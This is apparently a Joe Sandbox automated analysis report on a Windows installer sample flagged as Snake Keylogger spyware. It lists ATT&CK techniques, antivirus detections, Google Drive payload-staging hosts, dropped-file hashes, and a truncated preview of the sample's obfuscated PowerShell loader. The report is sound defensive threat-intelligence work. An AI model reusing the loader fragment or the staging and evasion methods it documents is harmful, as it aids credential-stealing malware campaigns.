      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Users\user\Desktop\You7ynHizy.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
      | Credentials | Domains | Default Accounts | 2 PowerShell | Boot or Logon Initialization Scripts | 311 Process Injection | 131 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
      | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
      | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | You7ynHizy.exe | 66% | Virustotal | |
      | You7ynHizy.exe | 65% | ReversingLabs | Win32.Spyware.Snakekeylogger |
      | You7ynHizy.exe | 100% | Avira | TR/Injector.ljese |

      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe | 100% | Avira | TR/Injector.ljese |
      | C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe | 65% | ReversingLabs | Win32.Spyware.Snakekeylogger |

      No Antivirus matches
      No Antivirus matches

      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | https://drive.go | 0% | Avira URL Cloud | safe |
      | https://dhttps://drive.usercontez | 0% | Avira URL Cloud | safe |
      | http://www.microsoft.D | 0% | Avira URL Cloud | safe |

      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|---|---|
      | drive.google.com | 142.250.185.110 | true | false | | high |
      | drive.usercontent.google.com | 216.58.206.65 | true | false | | high |
00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2511889664.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.google.com/~omsiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116840171.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116878506.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140381354.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093433677.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3023170701.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012198681.0000000007671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.google.com/emsiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive.usercontent.google.com/3msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://drive.usercontent.google.com/umsiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.110 | drive.google.com | United States | 15169 | GOOGLEUS | false
216.58.206.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1587590
                                                                                          Start date and time:2025-01-10 15:15:23 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 51s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:12
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:You7ynHizy.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@6/12@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 33.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 95%
                                                                                          • Number of executed functions: 107
                                                                                          • Number of non-executed functions: 25
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.253.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target msiexec.exe, PID 5692 because there are no executed function
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5036 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
Time | Type | Description
09:16:15 | API Interceptor | 40x Sleep call for process: powershell.exe modified
09:16:58 | API Interceptor | 34x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Xjz8dblHDe.exe | malicious | GuLoader | 142.250.185.110, 216.58.206.65
 | zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit | 142.250.185.110, 216.58.206.65
 | CY SEC AUDIT PLAN 2025.docx.doc | malicious | Unknown | 142.250.185.110, 216.58.206.65
 | gem1.exe | malicious | CredGrabber, Meduza Stealer | 142.250.185.110, 216.58.206.65
 | FIWszl1A8l.exe | malicious | GhostRat | 142.250.185.110, 216.58.206.65
 | 2873466535874-68348745.02.exe | malicious | Unknown | 142.250.185.110, 216.58.206.65
 | n41dQbiw1Y.exe | malicious | Babuk, Djvu | 142.250.185.110, 216.58.206.65
 | stage3.exe | malicious | CobaltStrike | 142.250.185.110, 216.58.206.65
 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 142.250.185.110, 216.58.206.65
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):14744
                                                                                          Entropy (8bit):4.992175361088568
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):478461
                                                                                          Entropy (8bit):1.2475162534380173
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
                                                                                          MD5:BF4A008DC0B6586BA5DC8205FFC7DF72
                                                                                          SHA1:0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
                                                                                          SHA-256:497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
                                                                                          SHA-512:71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:ASCII text, with very long lines (3239), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):54244
                                                                                          Entropy (8bit):5.277142980394084
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:wBN5cfD5CexdtljClWKId45M3ylcZuxZvlKaOT:wW75jjuIWaaxtl3m
                                                                                          MD5:093A76933D4F5ACC7E8710092DB5D62D
                                                                                          SHA1:4CDB7220CF42BAE8F203912558ED514E82BDCAC0
                                                                                          SHA-256:15FC2C43369D3A532643A24D84C3A54B38C47FD2E4570C24FF83E4929100EF25
                                                                                          SHA-512:CB6C33ED85603EA07F0E6BB1C10DB54992D36ED2AE888A56ECE7B06AB7E7FA06A761E1DB43ABE100093AB8A1BC37BC76E09CBBC9650B289B52B5838F15F1A34F
                                                                                          Malicious:true
                                                                                          Preview:$Skismaet215=$Hjords;..<#Ankeinstansers Tsar Elementarpartiklerne Dispergated Pervagation #>..<#Futural Krobylos Overlevelsers Unvictimizeds peafowl Raagummi Nonaccordant #>..<#naturopathic Warships Vagttaarne Interlardment #>..<#Unreproachable Derange Herskerne #>..<#Antispadix Gaveafgift unmaterialized Banjoens Pilei Skocremer #>..<#Srheders Flaskevand Dialektologis #>...$Buddingpulver = @'.gevi.. ndst$Und,rGTils eF mbrnEgalinHu deeWaldomDecapfdivisrBomb eTugthl Sepusdepr eLucenrHalsbnBereneGenl =Dilat$HyperNIndise StoluChastrObsero M.mip ParhtSprnge Sk,draktanoRa ion ulph;prost.ReinifAflnnu ManqnTranscHerbstH ndsiBadiooScoven Brev ExtroASheltfRednifTaloraHammelFrdigd Betvs ForopMetodrMellioJitsudFridauNongecCancheTrinin.nbentPrstaeacousr UndenBil eeBlreh Tro f( Bund$BearbELavtlp.onfieperidiSatirr Omp.o ochigraasye S,mbnSiameyBrand,Skede$Rem nSSalontRulleuOceanmKommip,eoxieH,romrKvitts .kna)Indfo Vandl{ Z.na. Ap e.Livsb$Coa,eSTjurhtKons,aShoppb SkrmeNonstl atofpSlutslServiaMeditdGile
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:Matlab v4 mat-file (little endian) \224\224, numeric, rows 12237312, columns 2779054330, imaginary
                                                                                          Category:dropped
                                                                                          Size (bytes):314564
                                                                                          Entropy (8bit):7.694367926160216
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HwvjWWlPYh6QcbC/tZ/Mgk6+HfPwm2VYOiaFfKVqh9YN/lkDpB9n26h01hmW:HwviFQJbkewmYpf7YEpB926hYcW
                                                                                          MD5:26C7AF068C7A28FCEAB7D79EB92DC3E5
                                                                                          SHA1:2CB47B61A7DCA9DE6725AC6F16B09B6D4E31B87B
                                                                                          SHA-256:F0FF2DBCA77C34AA69EED79D68ADD193B0F415B688481B382EA324E0E62F67AD
                                                                                          SHA-512:5B138E09AA7BE673BFF9AA83A8D6F05C8F1C3185003B2F604004C3AD5B3529A73D444DCA2879F2900391DD3BEC9D36A58EFBF85B5FC2580BA690BD145A3281C9
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):436009
                                                                                          Entropy (8bit):1.2582605930205382
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
                                                                                          MD5:BA41A53F0CE12BDF6DDE858C1BB56E67
                                                                                          SHA1:28CC8982281E9540750800B87B128ACF3E86E1B4
                                                                                          SHA-256:0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
                                                                                          SHA-512:77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):672464
                                                                                          Entropy (8bit):7.738289638576833
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:D2QJ9o2sW3B9o2G2/6SkwoFzwjGPi54KeS/8chssEprfUhyWjX53XOn:Dv9o2sW3B9oV2iSkwotwfTx2sKUhyaRu
                                                                                          MD5:98E8E7C349CBB65B53681757DC2959AE
                                                                                          SHA1:8FBB5F9C2A9E524C39AB6269A083353A898D5B57
                                                                                          SHA-256:A2091538AAA8D84E6A73BEE323DAA339C64D4CB13D857A05742445F65FC66013
                                                                                          SHA-512:8A9C030981D8C9D666F46602EC2BF1A84D38F414A60D6E77582CCCD47621113FB574F4C57A1CDD11C2D2F2CE9A7ACB122443645A59D0FFD6F995C4F3A2426AF4
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?......!....@..........................................@=..|...........9...............................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                          Process:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):356
                                                                                          Entropy (8bit):4.234486179912683
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
                                                                                          MD5:E514D8FDFF4A7AC568F2DED93DADB44E
                                                                                          SHA1:DF81016124C8941F2D9F75B1BCB3D951F911626C
                                                                                          SHA-256:687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
                                                                                          SHA-512:E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
                                                                                          Malicious:false
                                                                                          Preview:udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.738289638576833
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:You7ynHizy.exe
                                                                                          File size:672'464 bytes
                                                                                          MD5:98e8e7c349cbb65b53681757dc2959ae
                                                                                          SHA1:8fbb5f9c2a9e524c39ab6269a083353a898d5b57
                                                                                          SHA256:a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013
                                                                                          SHA512:8a9c030981d8c9d666f46602ec2bf1a84d38f414a60d6e77582cccd47621113fb574f4c57a1cdd11c2d2f2ce9a7acb122443645a59d0ffd6f995c4f3a2426af4
                                                                                          SSDEEP:12288:D2QJ9o2sW3B9o2G2/6SkwoFzwjGPi54KeS/8chssEprfUhyWjX53XOn:Dv9o2sW3B9oV2iSkwotwfTx2sKUhyaRu
                                                                                          TLSH:80E40246B150C9AFC6E5B2348566DB58E4B77CB18C32428B73D13B8CEDBDB51684B813
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                                          Icon Hash:397d694151710f3c
                                                                                          Entrypoint:0x40336c
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                          Signature Valid:false
                                                                                          Signature Issuer:CN="Overfladearealernes jerreeds Zygnemaceous ", E=Martine@Noodleism.uke, L=Sandwith, S=England, C=GB
                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                          Error Number:-2146762487
                                                                                          Not Before, Not After
                                                                                          • 31/08/2024 05:36:53 31/08/2027 05:36:53
                                                                                          Subject Chain
                                                                                          • CN="Overfladearealernes jerreeds Zygnemaceous ", E=Martine@Noodleism.uke, L=Sandwith, S=England, C=GB
                                                                                          Version:3
                                                                                          Thumbprint MD5:D14B07C67541D7394FE48F79E92EF7EF
                                                                                          Thumbprint SHA-1:2F4C585543297A75AECF936E3B2D1CD7E6C067C5
